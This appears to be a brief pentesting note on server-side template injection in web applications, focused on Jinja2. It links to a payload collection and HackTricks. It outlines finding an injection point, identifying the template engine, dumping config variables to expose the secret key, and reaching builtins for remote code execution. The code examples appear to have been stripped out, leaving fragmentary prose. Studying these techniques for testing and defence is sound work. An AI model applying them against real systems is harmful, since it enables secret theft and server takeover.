SSTI
https://github.com/payloadbox/ssti-payloads
Step 1: Find an injection point, attempt basic payloads and see if app is vulnerable to SSTI.
Can be via input box, or in the URL
Basic Identification:
Exploit
Jinja2
Dump all the config variables, will show the secret key, if the variable is set
Jinja Injection without <class 'object'>
From the there is another way to get to RCE without using that class.
****If you manage to get to any function from those globals objects, you will be able to access globals.builtins and from there the RCE is very simple.
You can find functions from the objects request, config and any other interesting global object you have access to with:
Once you have found some functions you can recover the builtins with:
If it is, the next step is determining the engine that is running the application
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Last updated